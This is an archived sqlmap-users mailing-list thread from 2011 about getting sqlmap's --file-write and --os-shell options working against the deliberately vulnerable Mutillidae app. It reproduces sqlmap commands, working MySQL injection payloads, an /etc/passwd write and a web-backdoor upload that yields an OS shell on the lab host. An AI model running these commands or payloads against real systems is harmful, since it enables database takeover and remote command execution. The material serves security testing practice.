Hi Bernardo
I'm not sure what you mean when you say that the POST parameters are
invalid. I tried the following:
C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti
llidae/index.php?page=user-info.php" --data "username=foo&password=bar
&user-info-php-submit-button=View+Account+details" -p "username" --os-shell
and the following occurs:
[11:31:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:31:47] [INFO] going to use a web backdoor for command prompt
[11:31:47] [INFO] fingerprinting the back-end DBMS operating system
[11:31:48] [INFO] the back-end DBMS operating system is Windows
[11:31:48] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
ub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload th
e agent [Enter for None]: C:\wamp\www\mutillidae
[11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/
mutillidae'
[11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/
mutillidae/mutillidae'
[11:32:08] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 2 times
[11:32:08] [INFO] Fetched data logged to text files under 'C:\Program
Files\sqlmap-0.9\output\localhost'
[*] shutting down at 11:32:08
Could it be to do with:
[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
ub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload th
e agent [Enter for None]: C:\wamp\www\mutillidae
Regards
Chris
On 6 July 2011 23:52, Bernardo Damele A. G. <bernardo.dam...@gmail.com>wrote:
> Hi Chris,
>
> No worries.
> If you want command execution, sqlmap can handle it automatically also
> when it's MySQL and you've got a writable folder within the document
> root, --os-cmd and --os-shell. Also, --os-pwn can work in this
> scenario too.
> The file stager uploaded is 0KB because you provide invalid values to
> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
> upload the file stager against MySQL.
>
> See:
> --8<--
> $ python sqlmap.py -u
> "http://debian32/mutillidae/index.php?page=user-info.php"; --data
> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1
> --os-shell --flush-session
>
> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> tool
> http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 23:49:52
>
> [23:49:52] [INFO] setting file for logging HTTP traffic
> [23:49:52] [INFO] using
>
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> as session file
> [23:49:52] [INFO] flushing session file
> [23:49:52] [INFO] testing connection to the target url
> [23:49:52] [INFO] heuristics detected web page charset 'ascii'
> [23:49:52] [INFO] testing if the url is stable, wait a few seconds
> [23:49:53] [INFO] url is stable
> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not
> dynamic
> [23:49:53] [INFO] heuristic test shows that POST parameter
> 'view_user_name' might be injectable (possible DBMS: MySQL)
> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> HAVING clause'
> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND
> error-based - WHERE or HAVING clause' injectable
> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11
> AND time-based blind' injectable
> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> query (NULL) - 1 to 10 columns' injectable
> POST parameter 'view_user_name' is vulnerable. Do you want to keep
> testing the others? [y/N]
> sqlmap identified the following injection points with a total of 30
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: view_user_name
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033)
> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 1 to 10 columns
> Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL,
>
> CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113)
> AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND
> 'TOwv'='TOwv&password=adminpass&Submit_button=Submit
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: view_user_name=admin' AND SLEEP(5) AND
> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit
> ---
>
> [23:51:31] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.2.6, Apache 2.2.9
> back-end DBMS: MySQL 5.0
> [23:51:31] [INFO] going to use a web backdoor for command prompt
> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system
> [23:51:31] [INFO] the back-end DBMS operating system is Linux
> [23:51:31] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] PHP (default)
> [4] JSP
> >
> [23:51:32] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [/var/www/]:
> [23:51:32] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload
> the agent [Enter for None]: /var/www/test
> [23:51:35] [WARNING] unable to upload the file stager on '/var/www'
> [23:51:35] [INFO] the file stager has been successfully uploaded on
> '/var/www/test' - http://debian32:80/test/tmpugbmo.php
> [23:51:35] [INFO] the backdoor has probably been successfully uploaded
> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
> os-shell> id
> do you want to retrieve the command standard output? [Y/n/a]
> command standard output: 'uid=33(www-data) gid=33(www-data)
> groups=33(www-data)'
>
> os-shell> pwd
> do you want to retrieve the command standard output? [Y/n/a]
> command standard output: '/var/www/test'
>
> os-shell> exit
> [23:51:44] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 1 times
> [23:51:44] [INFO] Fetched data logged to text files under
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'
>
> [*] shutting down at 23:51:44
> --8<--
>
> Cheers,
> Bernardo
>
>
> On 6 July 2011 23:46, <christopher.oak...@gmail.com> wrote:
> > Hi
> >
> > Thanks. It turns out I was being an idiot. With absolute paths I didn't
> realise that this also includes the destination file name. With that
> included, it works like a dream.
> >
> > What I haven't managed to get going properly yet is the --os-cmd flag.
> The temp stager file does appear, but is empty, 0KB. However; I think I'll
> save that one for another day!
> >
> > Regards
> >
> > Chris
> > ------------------
> >
> > -----Original Message-----
> > From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com>
> > Date: Wed, 6 Jul 2011 23:42:22
> > To: Chris Oakley<christopher.oak...@gmail.com>
> > Cc: <sqlmap-users@lists.sourceforge.net>
> > Subject: Re: [sqlmap-users] File Writing
> >
> > Hi Chris,
> >
> > To me it works well:
> > --8<--
> > $ python sqlmap.py -u
> > "http://debian32/mutillidae/index.php?page=user-info.php"; --forms -p
> > view_user_name --risk 3 --level 3 --parse-errors --file-write
> > /etc/passwd --file-dest /tmp/test --flush-session
> >
> > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> tool
> > http://sqlmap.sourceforge.net
> >
> > [!] legal disclaimer: usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility
> > to obey all applicable local, state and federal laws. Authors assume
> > no liability and are not responsible for any misuse or damage caused
> > by this program
> >
> > [*] starting at 23:26:35
> >
> > [23:26:35] [INFO] setting file for logging HTTP traffic
> > [23:26:35] [INFO] testing connection to the target url
> > [23:26:35] [INFO] heuristics detected web page charset 'ascii'
> > [23:26:35] [INFO] searching for forms
> > [#1] form:
> > POST http://debian32:80/mutillidae/index.php?page=user-info.php
> > POST data: view_user_name=&password=&Submit_button=Submit
> > do you want to test this form? [Y/n/q]
> >>
> > Edit POST data [default:
> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
> > detected):
> > do you want to fill blank fields with random values? [Y/n]
> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you
> > provided is not inside the GET
> > [23:26:37] [INFO] using
> >
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> > as session file
> > [23:26:37] [INFO] flushing session file
> > [23:26:37] [INFO] using
> >
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> > as results file
> > [23:26:37] [INFO] heuristics detected web page charset 'ascii'
> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds
> > [23:26:38] [INFO] url is stable
> > [23:26:38] [INFO] heuristic test shows that POST parameter
> > 'view_user_name' might be injectable (possible DBMS: MySQL)
> > [23:26:38] [INFO] testing sql injection on POST parameter
> 'view_user_name'
> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> clause'
> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> > clause (Generic comment)'
> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
> > blind - WHERE or HAVING clause (Generic comment)' injectable
> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> > HAVING clause'
> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
> > HAVING clause'
> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
> clause'
> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
> clause'
> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
> > error-based - WHERE or HAVING clause' injectable
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
> query)'
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> > [23:26:43] [INFO] target url appears to be UNION injectable with 4
> columns
> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> > query (NULL) - 1 to 10 columns' injectable
> > [23:26:43] [WARNING] in OR boolean-based injections, please consider
> > usage of switch --drop-set-cookie if you experience any problems
> > during data retrieval
> > POST parameter 'view_user_name' is vulnerable. Do you want to keep
> > testing the others? [y/N]
> > sqlmap identified the following injection points with a total of 148
> > HTTP(s) requests:
> > ---
> > Place: POST
> > Parameter: view_user_name
> > Type: boolean-based blind
> > Title: OR boolean-based blind - WHERE or HAVING clause (Generic
> comment)
> > Payload: view_user_name=-5244' OR NOT (1884=1884)--
> > &password=bDXj&Submit_button=Submit
> >
> > Type: error-based
> > Title: MySQL OR error-based - WHERE or HAVING clause
> > Payload: view_user_name=-3024' OR 1 GROUP BY
> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
> > &password=bDXj&Submit_button=Submit
> >
> > Type: UNION query
> > Title: MySQL UNION query (NULL) - 1 to 10 columns
> > Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
> >
> CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
> > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
> > NULL#&password=bDXj&Submit_button=Submit
> > ---
> >
> > do you want to exploit this SQL injection? [Y/n]
> > [23:26:46] [INFO] testing MySQL
> > [23:26:46] [INFO] confirming MySQL
> > [23:26:46] [INFO] the back-end DBMS is MySQL
> >
> > web application technology: PHP 5.2.6, Apache 2.2.9
> > back-end DBMS: MySQL >= 5.0.0
> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system
> > [23:26:46] [INFO] the back-end DBMS operating system is Linux
> > [23:26:46] [WARNING] if the problem persists with 'None' values please
> > try to use hidden switch --no-cast (fixing problems with some
> > collation issues)
> > do you want confirmation that the file '/tmp/test' has been
> > successfully written on the back-end DBMS file system? [Y/n]
> > [23:26:48] [INFO] the file has been successfully written and its size
> > is 1848 bytes, but the size differs from the local file '/etc/passwd'
> > (1845 bytes)
> > [23:26:48] [WARNING] expect junk characters inside the file as a
> > leftover from UNION query
> > [23:26:48] [INFO] you can find results of scanning in multiple targets
> > mode inside the CSV file
> >
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> >
> > [*] shutting down at 23:26:48
> > --8<--
> >
> > Cheers,
> > Bernardo
> >
> >
> > On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote:
> >> Hi
> >>
> >> I'm playing with file writing. I have a full privs root user set up in
> >> mysql and am using
> >>
> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> >> to play with. I've set up a /temp folder below the web root of the app.
> >> I've put a file "evil.php" in the sqlmap working directory. I've also
> >> changed the permissions for all users on the temp folder to write access
> >> allowed.
> >>
> >> I'm using the following input to try and upload this file:
> >>
> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
> >> "http://localhost/mutillidae/ind
> >> ex.php?page=user-info.php" --data
> >> "username=&password=&user-info-php-submit-butt
> >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085";
> >> --file-wr
> >> ite "evil.php" --file-dest "temp/evil.php"
> >>
> >> This is with the latest dev build by the way.
> >>
> >> The output I get is:
> >>
> >> [18:00:03] [INFO] the back-end DBMS is MySQL
> >> web server operating system: Windows
> >> web application technology: PHP 5.3.5, Apache 2.2.17
> >> back-end DBMS: MySQL 5.0
> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> >> [18:00:04] [WARNING] if the problem persists with 'None' values please
> try
> >> to us
> >> e hidden switch --no-cast (fixing problems with some collation issues)
> >> do you want confirmation that the file 'temp/evil.php' has been
> successfully
> >> wri
> >> tten on the back-end DBMS file system? [Y/n]
> >> [18:00:12] [WARNING] it looks like the file has not been written, this
> can
> >> occur
> >> if the DBMS process' user has no write privileges in the destination
> path
> >> [18:00:12] [WARNING] expect junk characters inside the file as a
> leftover
> >> from U
> >> NION query
> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
> >> Files\sqlm
> >> ap-0.9\output\localhost'
> >>
> >> [*] shutting down at 18:00:12
> >>
> >> and sure enough the file isn't written. I've also tried using the
> --no-cast
> >> switch, to no avail.
> >>
> >> Does anyone have any ideas on what could be going wrong here? I can use
> the
> >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd
> and
> >> --os-pwn commands also fail at the stager upload phase, probably for
> similar
> >> reasons.
> >>
> >> Any help would be appreciated
> >>
> >> Cheers
> >>
> >> Chris
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> All of the data generated in your IT infrastructure is seriously
> valuable.
> >> Why? It contains a definitive record of application performance,
> security
> >> threats, fraudulent activity, and more. Splunk takes this data and makes
> >> sense of it. IT sense. And common sense.
> >> http://p.sf.net/sfu/splunk-d2d-c2
> >>_______________________________________________
> >> sqlmap-users mailing list
> >> sqlmap-users@lists.sourceforge.net
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
> >
> >
> >
> > --
> > Bernardo Damele A. G.
> >
> > E-mail / Jabber: bernardo.damele (at) gmail.com
> > Mobile: +447788962949 (UK 07788962949)
> > PGP Key ID: Unavailable
> >
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>
------------------------------------------------------------------------------
All of the data generated in your IT infrastructure is seriously valuable.
Why? It contains a definitive record of application performance, security
threats, fraudulent activity, and more. Splunk takes this data and makes
sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-d2d-c2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
